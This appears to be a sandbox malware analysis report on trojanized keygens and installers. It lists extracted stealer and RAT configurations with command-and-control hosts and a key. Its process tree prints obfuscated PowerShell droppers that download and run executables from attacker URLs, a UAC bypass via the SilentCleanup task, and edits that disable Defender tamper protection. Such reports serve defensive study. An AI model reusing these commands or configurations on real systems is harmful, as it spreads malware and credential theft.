Resubmissions (4)
18/11/2020, 14:18 UTC   201118-dj27sn3f52   10
18/11/2020, 13:42 UTC   201118-1arz86e7w6   10
18/11/2020, 13:38 UTC   201118-n8jh228ctn   10

Analysis
max time kernel: 1802s
max time network: 1815s
platform: windows10_x64
resource: win10v20201028
submitted: 18/11/2020, 13:42 UTC
Tasks
Static task: static1

Behavioral task   Sample                                                                 Resource
behavioral1       2019-09-02_22-41-10.bin.exe                                            win10v20201028
behavioral2       31.bin.exe                                                             win10v20201028
behavioral3       3DMark 11 Advanced Edition.bin.exe                                     win10v20201028
behavioral4       Archive.zip__ccacaxs2tbz2t6ob3e.bin.exe                                win10v20201028
behavioral5       CVE-2018-15982_PoC.swf                                                 win10v20201028
behavioral6       DiskInternals_Uneraser_v5_keygen.bin.exe                               win10v20201028
behavioral7       ForceOp 2.8.7 - By RaiSence.bin.exe                                    win10v20201028
behavioral8       HYDRA.bin.exe                                                          win10v20201028
behavioral9       Keygen.bin.exe                                                         win10v20201028
behavioral10      LtHv0O2KZDK4M637.bin.exe                                               win10v20201028
behavioral11      OnlineInstaller.bin.exe                                                win10v20201028
behavioral12      Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.bin.exe               win10v20201028
behavioral13      Treasure.Vault.3D.Screensaver.keygen.by.Paradox.bin.exe                win10v20201028
behavioral14      VyprVPN.exe                                                            win10v20201028
behavioral15      WSHSetup[1].bin.exe                                                    win10v20201028
behavioral16      api.exe                                                                win10v20201028
behavioral17      efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js   win10v20201028
behavioral18      good.bin.exe                                                           win10v20201028
behavioral19      infected dot net installer.bin.exe                                     win10v20201028
behavioral20      update.bin.exe                                                         win10v20201028
behavioral21      vir1.xls                                                               win10v20201028
behavioral22      xNet.dll                                                               win10v20201028
behavioral23      1.bin.exe                                                              win10v20201028
behavioral24      VPN/VyprVPN.exe                                                        win10v20201028
behavioral25      VPN/xNet.dll                                                           win10v20201028
behavioral26      WSHSetup[1].bin.exe                                                    win10v20201028
General

Malware Config

Extracted
http://rbcxvnb.ug/zxcvb.exe

Extracted
http://zxvbcrt.ug/zxcvb.exe

Extracted
http://bit.do/fqhHT

Extracted
http://bit.do/fqhJv

Extracted
http://bit.do/fqhJD

Extracted
http://pdshcjvnv.ug/zxcvb.exe

Extracted
raccoon
c6f4c67877b4427c759f396ca4c1dff4761d3cc9
url4cnc: https://telete.in/brikitiki

Extracted
azorult
http://195.245.112.115/index.php

Extracted
asyncrat
0.5.7B
agentttt.ac.ug:6970
agentpurple.ac.ug:6970
AsyncMutex_6SI8OkPnk
aes_key: 16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
anti_detection: false
autorun: false
bdos: false
delay: Default
host: agentttt.ac.ug,agentpurple.ac.ug
hwid: 3
install_file: (not set)
install_folder: %AppData%
mutex: AsyncMutex_6SI8OkPnk
pastebin_config: null
port: 6970
version: 0.5.7B
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Contains code to disable Windows Defender 10 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Oski
Oski is an infostealer targeting browser data and cryptocurrency wallets.
-
Async RAT payload 3 IoCs
resource                                                                       yara_rule
behavioral9/memory/4164-221-0x0000000000400000-0x0000000000412000-memory.dmp   asyncrat
behavioral9/memory/4164-222-0x000000000040C76E-mapping.dmp                     asyncrat
behavioral9/memory/3672-720-0x000000000040C76E-mapping.dmp                     asyncrat

ModiLoader First Stage 2 IoCs
resource                                                                       yara_rule
behavioral9/memory/4180-280-0x0000000002120000-0x0000000002130000-memory.dmp   modiloader_stage1
behavioral9/memory/5868-707-0x0000000002260000-0x0000000002270000-memory.dmp   modiloader_stage1

Blocklisted process makes network request 6 IoCs
flow   pid    Process
22     4088   powershell.exe
23     1528   powershell.exe
24     3608   powershell.exe
28     4088   powershell.exe
29     1528   powershell.exe
30     3608   powershell.exe
Downloads MZ/PE file
-
Executes dropped EXE 35 IoCs
Modifies Installed Components in the registry 2 TTPs
-
Loads dropped DLL 22 IoCs
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description       ioc                                                                                                  Process
Key created       \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features                           SmMNW0P9JH.exe
Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"    SmMNW0P9JH.exe
Set value (int)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"    1nONCENDZY.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description       ioc                                                                                                                                              Process
Set value (str)   \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Klfn = "C:\\Users\\Admin\\AppData\\Local\\nflK.url"   FcIiEO8Bol.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 2 IoCs
description    ioc                                                                Process
File created   C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini       txi.exe
File created   C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini       mkx.exe

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description              ioc      Process
File opened (read-only)  \??\D:   explorer.exe
Suspicious use of SetThreadContext 12 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description         ioc                                                                                   Process
Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString   HuytgfGDFwer.exe
Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString   oscjgfhwvvas.exe

Delays execution with timeout.exe 4 IoCs
pid    Process
1436   timeout.exe
3680   timeout.exe
2564   timeout.exe
3428   timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs
description         ioc                                                          Process
Key opened          \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS            SearchUI.exe
Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU  SearchUI.exe

Kills process with taskkill 4 IoCs
pid    Process
2844   taskkill.exe
956    taskkill.exe
4908   taskkill.exe
4560   taskkill.exe
Modifies registry class 30 IoCs
Modifies registry key 1 TTPs 2 IoCs
pid    Process
4120   reg.exe
4392   reg.exe

description        ioc                                                                                                                   Process
Key created        \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349   FcIiEO8Bol.exe
Set value (data)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [binary blob omitted from report]   FcIiEO8Bol.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid    Process
6088   explorer.exe

Suspicious behavior: MapViewOfSection 3 IoCs
pid    Process
5024   mkx.exe
4468   zVhjgfutyFD.exe
4476   HuytgfGDFwer.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 49 IoCs
Suspicious use of SendNotifyMessage 38 IoCs
Suspicious use of SetWindowsHookEx 13 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:732 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\790E.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Users\Admin\AppData\Local\Temp\790E.tmp\Keygen.exeKeygen.exe3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID: 504

Process (level 3): C:\Windows\SysWOW64\mshta.exe
Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
- Suspicious use of WriteProcessMemory
PID: 2276

Process (level 4): C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 1528

Process (level 5): C:\Users\Public\pvr.exe
Command line: "C:\Users\Public\pvr.exe"
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID: 5104
Process (level 3): C:\Windows\SysWOW64\mshta.exe
Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
- Suspicious use of WriteProcessMemory
PID: 920

Process (level 4): C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2168

Process (level 3): C:\Windows\SysWOW64\timeout.exe
Command line: timeout 1
- Delays execution with timeout.exe
PID: 1436
Process (level 3): C:\Windows\SysWOW64\mshta.exe
Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
- Suspicious use of WriteProcessMemory
PID: 2224

Process (level 4): C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 3608

Process (level 5): C:\Users\Public\txi.exe
Command line: "C:\Users\Public\txi.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID: 5116
Process (level 6): C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID: 5500

Process (level 7): C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID: 3060

Process (level 8): C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe
Command line: "{path}"
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID: 5044

Process (level 9): C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c taskkill /pid 5044 & erase C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe & RD /S /Q C:\\ProgramData\\135572298009183\\* & exit
PID: 4112

Process (level 10): C:\Windows\SysWOW64\taskkill.exe
Command line: taskkill /pid 5044
- Kills process with taskkill
PID: 4908

Process (level 7): C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe
Command line: "{path}"
- Executes dropped EXE
PID: 3100
Process (level 6): C:\Users\Public\txi.exe
Command line: "{path}"
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
PID: 5520

Process (level 7): C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID: 4360

Process (level 8): C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe"
- Executes dropped EXE
PID: 3672

Process (level 7): C:\Users\Admin\AppData\Local\Temp\eJZoW1GjJt.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\eJZoW1GjJt.exe"
- Executes dropped EXE
PID: 5868

Process (level 8): C:\Program Files (x86)\internet explorer\ieinstal.exe
Command line: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
PID: 3172

Process (level 7): C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID: 4776

Process (level 8): C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"
- Executes dropped EXE
PID: 6048

Process (level 8): C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"
- Executes dropped EXE
PID: 4512

Process (level 8): C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID: 3432

Process (level 9): \??\c:\windows\SysWOW64\cmstp.exe
Command line: "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\hazyeme1.inf
PID: 5472
Process (level 7): C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID: 6000

Process (level 8): C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe"
- Executes dropped EXE
- Windows security modification
PID: 6040

Process (level 9): C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" Get-MpPreference -verbose
PID: 3436

Process (level 7): C:\Windows\SysWOW64\cmd.exe
Command line: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\txi.exe"
PID: 5584

Process (level 8): C:\Windows\SysWOW64\timeout.exe
Command line: timeout /T 10 /NOBREAK
- Delays execution with timeout.exe
PID: 3428
Process (level 3): C:\Windows\SysWOW64\mshta.exe
Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
- Suspicious use of WriteProcessMemory
PID: 1092

Process (level 4): C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2284

Process (level 3): C:\Windows\SysWOW64\timeout.exe
Command line: timeout 2
- Delays execution with timeout.exe
PID: 3680
Process (level 3): C:\Windows\SysWOW64\mshta.exe
Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
- Suspicious use of WriteProcessMemory
PID: 1904

Process (level 4): C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 4088

Process (level 5): C:\Users\Public\mkx.exe
Command line: "C:\Users\Public\mkx.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID: 5024

Process (level 6): C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID: 4468

Process (level 7): C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"
- Executes dropped EXE
PID: 4652
Process (level 6): C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID: 4476

Process (level 7): C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID: 4668

Process (level 8): C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c taskkill /pid 4668 & erase C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe & RD /S /Q C:\\ProgramData\\523709105068992\\* & exit
PID: 4788

Process (level 9): C:\Windows\SysWOW64\taskkill.exe
Command line: taskkill /pid 4668
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID: 2844

Process (level 6): C:\Users\Public\mkx.exe
Command line: "C:\Users\Public\mkx.exe"
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
PID: 4272
Process (level 7): C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3560

Process (level 8): C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"
- Executes dropped EXE
PID: 2120

Process (level 8): C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"
- Executes dropped EXE
PID: 3960

Process (level 8): C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"
- Executes dropped EXE
PID: 4164
Process (level 7): C:\Users\Admin\AppData\Local\Temp\FcIiEO8Bol.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\FcIiEO8Bol.exe"
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
PID: 4180

Process (level 8): C:\Windows\SysWOW64\svchost.exe
Command line: "C:\Windows\System32\svchost.exe"
PID: 5280

Process (level 9): C:\Windows\SysWOW64\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\hJiKhtso.bat" "
PID: 5020

Process (level 10): C:\Windows\SysWOW64\reg.exe
Command line: reg delete hkcu\Environment /v windir /f
- Modifies registry key
PID: 4120

Process (level 10): C:\Windows\SysWOW64\reg.exe
Command line: reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
- Modifies registry key
PID: 4392

Process (level 10): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
PID: 2252

Process (level 9): C:\Windows\SysWOW64\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\hJiKhtso.bat" "
PID: 2428

Process (level 8): C:\Program Files (x86)\internet explorer\ieinstal.exe
Command line: "C:\Program Files (x86)\internet explorer\ieinstal.exe"
PID: 3196
Process (level 7): C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3764

Process (level 8): C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"
- Executes dropped EXE
PID: 1328

